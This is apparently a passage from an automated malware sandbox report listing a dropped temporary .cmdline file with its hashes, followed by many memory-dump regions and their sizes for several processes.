                                                          • \??\c:\Users\Admin\AppData\Local\Temp\oxrigczk\oxrigczk.cmdline

                                                            Filesize

                                                            607B

                                                            MD5

                                                            5c8651f6db67b48bc3e7b292e0b35df4

                                                            SHA1

                                                            ca099ab8f0ed57d75a3d00e012c7f554032877dc

                                                            SHA256

                                                            9cfa2c3f31d64d1e7cea7d2f75b18b319df8b235588d5b1f4332000922b53c84

                                                            SHA512

                                                            f962a573c0c29b352398ff62770df7ab39eb3acea4691a7855c7b447b0b55fe7ac2dab5b9cbbdabc5338c270ed522d17f54cbcc81c35d5778b566e5be4de9fc9

                                                          • memory/2300-76-0x00007FFC15F50000-0x00007FFC15F5D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/2300-184-0x00007FFC153B0000-0x00007FFC153DB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/2300-25-0x00007FFC026E0000-0x00007FFC02D47000-memory.dmp

                                                            Filesize

                                                            6.4MB

                                                          • memory/2300-29-0x00007FFC160F0000-0x00007FFC16117000-memory.dmp

                                                            Filesize

                                                            156KB

                                                          • memory/2300-77-0x00007FFC10ED0000-0x00007FFC10F83000-memory.dmp

                                                            Filesize

                                                            716KB

                                                          • memory/2300-146-0x00007FFC1AF10000-0x00007FFC1AF1F000-memory.dmp

                                                            Filesize

                                                            60KB

                                                          • memory/2300-78-0x00007FFC11A10000-0x00007FFC11A43000-memory.dmp

                                                            Filesize

                                                            204KB

                                                          • memory/2300-169-0x00007FFC026E0000-0x00007FFC02D47000-memory.dmp

                                                            Filesize

                                                            6.4MB

                                                          • memory/2300-195-0x00007FFC16280000-0x00007FFC16294000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/2300-194-0x00007FFC01B20000-0x00007FFC02053000-memory.dmp

                                                            Filesize

                                                            5.2MB

                                                          • memory/2300-193-0x00007FFC11660000-0x00007FFC1172E000-memory.dmp

                                                            Filesize

                                                            824KB

                                                          • memory/2300-192-0x00007FFC19840000-0x00007FFC1984D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/2300-191-0x00007FFC16C20000-0x00007FFC16C39000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/2300-190-0x00007FFC11A10000-0x00007FFC11A43000-memory.dmp

                                                            Filesize

                                                            204KB

                                                          • memory/2300-189-0x00007FFC11D00000-0x00007FFC11D25000-memory.dmp

                                                            Filesize

                                                            148KB

                                                          • memory/2300-188-0x00007FFC02060000-0x00007FFC021E9000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/2300-187-0x00007FFC19390000-0x00007FFC193AA000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/2300-186-0x00007FFC1AF10000-0x00007FFC1AF1F000-memory.dmp

                                                            Filesize

                                                            60KB

                                                          • memory/2300-185-0x00007FFC160F0000-0x00007FFC16117000-memory.dmp

                                                            Filesize

                                                            156KB

                                                          • memory/2300-32-0x00007FFC1AF10000-0x00007FFC1AF1F000-memory.dmp

                                                            Filesize

                                                            60KB

                                                          • memory/2300-183-0x00007FFC10ED0000-0x00007FFC10F83000-memory.dmp

                                                            Filesize

                                                            716KB

                                                          • memory/2300-182-0x00007FFC15F50000-0x00007FFC15F5D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/2300-79-0x00007FFC16280000-0x00007FFC16294000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/2300-71-0x00007FFC01B20000-0x00007FFC02053000-memory.dmp

                                                            Filesize

                                                            5.2MB

                                                          • memory/2300-104-0x00007FFC160F0000-0x00007FFC16117000-memory.dmp

                                                            Filesize

                                                            156KB

                                                          • memory/2300-69-0x00007FFC19840000-0x00007FFC1984D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/2300-70-0x00007FFC11660000-0x00007FFC1172E000-memory.dmp

                                                            Filesize

                                                            824KB

                                                          • memory/2300-62-0x00007FFC16C20000-0x00007FFC16C39000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/2300-60-0x00007FFC02060000-0x00007FFC021E9000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/2300-59-0x00007FFC11D00000-0x00007FFC11D25000-memory.dmp

                                                            Filesize

                                                            148KB

                                                          • memory/2300-74-0x00000291A05E0000-0x00000291A0B13000-memory.dmp

                                                            Filesize

                                                            5.2MB

                                                          • memory/2300-68-0x00007FFC026E0000-0x00007FFC02D47000-memory.dmp

                                                            Filesize

                                                            6.4MB

                                                          • memory/2300-52-0x00007FFC153B0000-0x00007FFC153DB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/2300-51-0x00007FFC19390000-0x00007FFC193AA000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/4464-132-0x0000019DB22F0000-0x0000019DB22F8000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/4692-80-0x00007FFC00FA3000-0x00007FFC00FA5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/4692-95-0x000002E1E4D20000-0x000002E1E4D42000-memory.dmp

                                                            Filesize

                                                            136KB